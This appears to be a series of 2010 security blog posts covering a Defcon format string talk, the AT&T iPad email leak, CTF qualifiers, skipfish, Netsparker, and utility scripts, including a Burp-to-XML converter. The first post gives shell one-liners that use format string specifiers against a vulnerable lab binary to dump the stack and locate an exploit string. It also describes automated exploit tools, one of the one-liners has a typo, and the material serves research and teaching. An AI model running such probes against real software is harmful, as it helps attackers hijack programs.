Congratulations to those that survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks and especially the post Q&A and Mario Kart. My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from my talk, sans voice:

Demo 1: Attacking a program vulnerable (Makefile) to a format string attack, we dump the stack of the program until we find our passed format string using the following code:
for i in {001..200}; do echo -n "offset $i (%$i\$08x) = "; ./printf "%$i\$08x" | python -c "import sys, struct; s=int(sys.stdin.read(),16); print '0x%08x: %s' % (s,repr(struct.pack('L',s)))"; done

Demo 2: Finding the address of our format string. This combined with the stack offset found in the previous step lets us associate any data on the stack with its address using the following code:
or i in {1..100}; do ./printf "offset $i = %$i\$p:%$i\$s"; echo; done | grep -v ^$

Demo 3: Video of our technique demonstrated in our previous POC tool automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and overwriting a known return location.

Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. This includes both a Python and Ruby implementation.

Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack exploited automatically by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. The Metasploit module and vulnerable server are available for download.

All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2

This week iPad owners had their emails leaked via a security vulnerability in the way iPads registered with AT&T’s 3g service. Approximately 114,000 email addresses were brute forced from a script that was supposed to recognize an iPad owners ICC ID ( an “unique” identifier” which turned out to be predictable) and supply them an AJAX response of that ICC ID’s associated email address.

The grey-hat security group that found the vulnerability brute-forced ICC ID’s and analyzed the resulting successful request/responses using a PHP script and faking the iPad user agent. This exploit was apparently released in the hacker scene before AT&T removed the functionality.

What’s the big deal?

Although email addresses are usually harmless a large number of high ranking military and government officials registered their .mil and .gov addresses with their iPads, not to mention celebrity email addresses that are usually hush-hush pieces of information. Knowing these addresses opens them up to a large number of spammers and would-be social engineers that will now be checking every login field on the internet for accounts belonging to them (and we all know celebs use strong passwords, yes?).

Many will have to be changed/removed entirely, some mail systems will need to be re-examined for hardness, spam rules will need to be tweaked, etc.  A lot of IT elbow grease will go into preventing damage from Apple’s and AT&T’s debacle. Early adopters of technology should always consider they are basically in the beta-test phase as far as security is concerned.

Remember, an iPad a day doesn’t keep the hackers away!

**UPDATE**

Praetorian Security released a blog that has the actual script used here.

Every year the hacking community, both black and whitehat, come together in Las Vegas for the annual Blackhat and Defcon conferences. We discuss new attacks, show interesting research, release tools, and let loose a bit. Defcon in particular centers around a number of great competitions, the most prestigious of them being the Defcon Capture The Flag.

Hacker teams from all over the world participate in the CTF qualifiers. This year 535 teams registered, 265 of which scored points. The top 10 play in the CTF event in Las Vegas at the conference. Think of it as a hacker superbowl.

This year we threw a team together, six guys (feakk, myself(@jhaddix),@OwNpile , @ap3r , @fulg0re , @timmedin), who had a few hours on the weekend to check out the game.  Only a few of us had played before, but one of our team members won with Shellphish back a few years ago.

Below is the scoreboard format and links to the solutions that have been posted on the web (in English so far). It’s a jeopardy style point game, the higher the points, the harder the question. We placed 66th as team dirty_apes =) We had a great time and hopefully will get to spend the full 3 days to hack next year.

Final Scores – http://www.ddtek.biz/qualsDC18scores.txt

Binaries to Download – http://work.hackerschool.org/DOWNLOAD/DefconCTF/2010/

For those of you who are struggling to find a way to convert PDF files into TXT files, here is a quick bash script. There are many alternatives out there, but none were reliable for me. You’ll need to have acroread and ghostscript installed for this to work.


#!/bin/bash
mkdir ps txt
FILES="*.pdf"
for f in $FILES
do
echo "Processing $f"
acroread -toPostScript $f ps/
g=`basename $f .pdf`
ps2txt ps/$g.ps > txt/$g.txt
done


You can also change the second to last line to read
ps2txt ps/$g.ps | grep -v "EXCLUDE" > txt/$g.txt
where EXCLUDE is a line that you want to exclude from each PDF. Please let me know if you have any problems.

enjoy,
db

You have followed our posts on how to install skipfish on your Ubuntu/Debian based machine, and read our testing with Mutillidae. With the rapid speed of skipfish releases however, your local copy may start to smell. Now you can automate the delivery of fresh fish to your doorstep. Copy the code below to update_skippy.sh in your skipfish directory, run chmod +x update_skippy.sh and then ./update_skippy.sh to ensure your security tool-bowl is kept well stocked.

#!/bin/bash
# Checks local version of skipfish and update if newer version exists
# Copyright (C) 2010 Paul Haas <phaas AT redspin DOT com>
# Licensed under the GNU Public License version 3.0 or greater

SKIP='https://code.google.com/p/skipfish/downloads/list'
TGZ='"[^"]*.tgz"'
LOCAL=$(head -n1 ChangeLog | grep -o '[0-9.]*')
REMOTE=$(wget -q "$SKIP" -O- | grep -e "version" | cut -d' ' -f4)
#REMOTE=$(curl -s "$SKIP" | grep -e "version" | cut -d' ' -f4) # Curl optional
LM=${LOCAL%.[0-9]*}
Lm=${LOCAL#[0-9]*.}
RM=${REMOTE%.[0-9]*}
Rm=${REMOTE#[0-9]*.}

if [[ "$LM" -lt "$RM" || "$LM" -eq "$RM" && "$Lm" -lt "$Rm" ]]
then
	echo "Updating Skipfish from $LOCAL to $REMOTE."
	wget -q "$SKIP" -O- | grep -o "$TGZ" | tr -d \" | wget -q -i- -O- | tar zxf - --strip=1
	#curl -s "$SKIP" | grep -o "$TGZ" | tr -d \" | xargs curl -s | tar zxf - --strip=1
	make clean
	make
else
	echo "Skipfish $LOCAL ($REMOTE) is up to date."
fi

Believe me when i say that we’ve used a lot of tools. We love scripts, we love things that free up our time to do the real analysis on a web application assessment. We have used w3af, nikto, Grendel Scan, etc, etc… We are really happy to see a new tool we have used in it’s pro version incarnation: Netsparker.

Netsparker announced today that it is releasing a community edition, lacking only a few features of the pro version. We highly appreciate this, especially its “free as in beer” type release. Yes it’s Windows only but we can forgive for a moment

Why is Netsparker valuable?

• It beats Appscan and Webinspect in injection tests most of the time
• Its spider is fast and furious
• Its configuration vulnerability database is up to date
• Its remediation advice is sound and technical
• It very rarely has false positives, and initial testing also shows low false negative results

CE doesn’t include some exploitation features and certain categories of Command injection, RFI, etc. Despite that it’s still a great tool to add to your utility belt, we recommend adding it you your security regiment for web applications =)

Check out the https://www.mavitunasecurity.com/pricing/ page to see the difference between pro and CE.

With the incorporation of Burp Suite Professional into our audit processes, we discovered that there was not an easy method to extract results from Burp’s session file without having to manually re-run Burp. In order to automate this process, we have developed a standalone Python script to process Burp’s session files into XML, and have released it under the GPLv3 License here burp2xml.py:

#!/usr/bin/env python
#Developed by Paul Haas, <phaas AT redspin DOT com> under Redspin. Inc.
#Licensed under the GNU Public License version 3.0 (2008-2009)
'''Process Burp Suite Professional's output into a well-formed XML document.

Burp Suite Pro's session file zipped into a combination of XML-like tags
containing leading binary headers with type and length definitions followed by
the actual data.  The theory is that this allows the file to read sequentially
rather than requiring tedious XML parsing.  However, without re-writing Burp's
internal parser, we have no way to extract results from its files without
loading the results in Burp.  

This tool takes a zipped Burp file and outputs a XML document based upon the
provided arguments which allows regular XPATH queries and XSL transformations.
'''
import datetime, string, re, struct, zipfile, sys

TAG = re.compile('</?(\w*)>',re.M) # Match a XML tag
nvprint = string.printable.replace('\x0b','').replace('\x0c','') # Printables

def milliseconds_to_date(milliseconds):
	'''Convert milliseconds since Epoch (from Java) to Python date structure:
	See: http://java.sun.com/j2se/1.4.2/docs/api/java/util/Date.html

	There is no direct way to convert milliseconds since Epoch to Python object
	So we convert the milliseconds to seconds first as a POSIX timestamp which
	can be used to get a valid date, and then use the parsed values from that
	object along with converting mili -> micro seconds in a new date object.'''
	try:
		d = datetime.datetime.fromtimestamp(milliseconds/1000)
		date = datetime.datetime(d.year,d.month,d.day,d.hour,d.minute,d.second,
			(milliseconds%1000)*1000)
	except ValueError, e: # Bad date, just return the milliseconds
		date = str(milliseconds)
	return date	

def burp_binary_field(field,i):
	'''Strip Burp Suite's binary format characters types from our data.
	The first character after the leading tag describes the type of the data.'''
	if len(field) <= i:
		return None,-1
	elif field[i] == '\x00': # 4 byte integer value
		return str(struct.unpack('>I',field[i+1:i+5])[0]),5
	elif field[i] == '\x01': # Two possible unsigned long long types
		if field[i+1] == '\x00': # (64bit) 8 Byte Java Date
			ms = struct.unpack('>Q',field[i+1:i+9])[0]
			date = milliseconds_to_date(ms)
			value =	date.ctime() # Use the ctime string format for date
		else: # Serial Number only used ocasionally in Burp
			value = str(struct.unpack('>Q',field[i+1:i+9])[0])
		return value,9
	elif field[i] == '\x02': # Boolean Object True/False
		return str(struct.unpack('?',field[i+1:i+2])[0]),2
	elif field[i] == '\x03' or field[i] == '\x04': # 4 byte length + string
		length = struct.unpack('>I',field[i+1:i+5])[0]
		#print "Saw string of length",length,"at",i+5,i+5+length
		value = field[i+5:i+5+length]
		if '<' in value or '>' in value or '&' in value: # Sanatize HTML w/CDATA
			value = '<![CDATA[' + value.replace(']]>',']]><![CDATA[') + ']]>'
		value = ''.join(c for c in value if c in nvprint) # Remove nonprintables
		return value,5+length # ** TODO: Verify length by matching end tag **
	print "Unknown binary format",repr(field[i])
	return None,-1

def burp_to_xml(filename):
	'''Unzip Burp's file, remove non-printable characters, CDATA any HTML,
	include a valid XML header and trailer, and return a valid XML string.'''

	xml = '' # Our output string
	z = zipfile.ZipFile(filename) # Open Burp's zip file
	burp = z.read('burp','rb') # Read-in the main burp file
	m = TAG.match(burp,0) # Match a tag at the start of the string
	while m:
		xml += m.group()
		index = m.end()
		etag = m.group().replace('<','</') # Matching tag

		m = TAG.match(burp,index) # Attempt to get the next tag
		if not m: # Data folows
			# Read the type of data using Burp's binary data headers
			value, length = burp_binary_field(burp, index)
			if value is None: break

			xml += value
			xml += etag
			index += length + len(etag) # Point our index to the next tag
			m = TAG.match(burp,index) # And retrieve it

	xml = '<?xml version="1.0"?><burp>' + xml + '</burp>' # XMLify our string
	return xml # And return it

def main():
	'''Called if script is run from the command line.'''
	import sys
	if (len(sys.argv) < 2):
		print __doc__
		print "Usage:",sys.argv[0],"burp_session_file {output XML name}"
		exit(1)
	xml = burp_to_xml(sys.argv[1])
	# Write out file to a optional argument or provided file + xml extension
	out = sys.argv[2] if (len(sys.argv) > 2) else sys.argv[1]+'.xml'
	out = open(out, 'wb')
	out.write(xml)
	out.close()
	#sys.stdout.write("# Output written to %s.xml" % out)

if __name__ == '__main__':
	main()

My next post will include some useful commands for parsing XML on the command line. Let us know if you have any questions running it or include it in your projects.

This morning the office was buzzing with Google hysteria. Google, releasing great security tools like RATproxy, has released a web application scanner similar to Nikto (and to a lesser extent Nessus web Checks) called Skipfish.

Now, we understand that not everyone is a Goog-Fanboy, but we love testing new apps.

We wrote a cursory install for a testbed machine here. Notice Skipfish has very low overhead in the dependencies area, which is great.

At first we tested Skipfish against a live domain we control. Below you can see the live statistics output. At first glance you notice that Google’s Skipfish is blazing fast. We got 600+ req/sec on a 10Mb connection, which is credit to it’s “pure C implementation, including a custom HTTP stack.” The live statistics are very verbose, breaking up both the “Scan Statistics” and “Database Statistics” :

We then decided to test against a very widespread testing environment, Mutillidae a set of vulnerable PHP’s scripts by Iron Geek. For kicks we also tested the same implementation with Nikto.

Before scanning we did a cursory review of the C source for detecting errors, which is pretty comprehensive and supports a large set of platforms. It’s Dictionary Bruting resource-list, by default, will auto-learn probable keywords and add any found resources to the wordlists file. Very cool.

In the twitter-verse many infosec friends were quick find faults in the code of the actual app, which is valid, but to the extent of a web app scanner we will live with inherent vulnerabilities if you deem Skipfish is a valuable tool.

After about a half day of using Skipfish, we have some mixed feelings. Although Google’s docs say that the input injection saves on requests it still managed to crash our janky Mutillidae install. It also Segfaulted and tanked our testing box when somehow hitting a loop and trying to parse out multiple same findings. BTW it is HEAVY on requests… like 1-2 million heavy.

Granted, on a successful completion, the output is pretty win. We like the “clickability” factor, and its conciseness on web 2.0 vulnerabilities.

The full doc explaining the injection tests of Skipfish can be found here towards the bottom of the page.

The Skinny:

We like it. As Google says, its not an end-all-be-all for web application scanners, but it definitely has some great logic, features, and is blazing fast. Also if you have seen the dev track the developer Michal Zalewski has been quick to update for problems (1.01b fixes some crashing problems) and has some great upcoming features planned (pause/resume, VIEWSTATE testing, etc.) Although no scanner will ever replace a smart web app assessment engineer, Skipfish shows some great potential in the security space and… its free. It wont replace any of our manual processes but we will definitely use it when applicable. Thanks Google.

** Updated:

After a full day of watching this puppy go we’d like to add that the scanning Skipfish does generates large amounts of http requests. We have heard reports of up to 10 million and that some people, testing against their providers, are being firewalled quickly. We recommend switching to the minimal .wl file and limiting your requests to say… 800k.

check out jason’s post for an in-depth review. http://bit.ly/9LAnbt

here’s the simple commands necessary to get hacking with Google’s new web application scanner Skipfish:

wget http://skipfish.googlecode.com/files/skipfish-1.01b.tgz
tar zxvf skipfish-1.01b.tgz
sudo apt-get install libidn11-dev
cd skipfish
make
cp dictionaries/default.wl skipfish.wl
./skipfish -o output_folder http://www.example.com

you’ll want to less README to understand all the options.

more to come shortly with our opinions, tips and lab results. currently we’re getting 600+ requests/second for internet sites, 4000+ requests/second for local tests.

enjoy,

db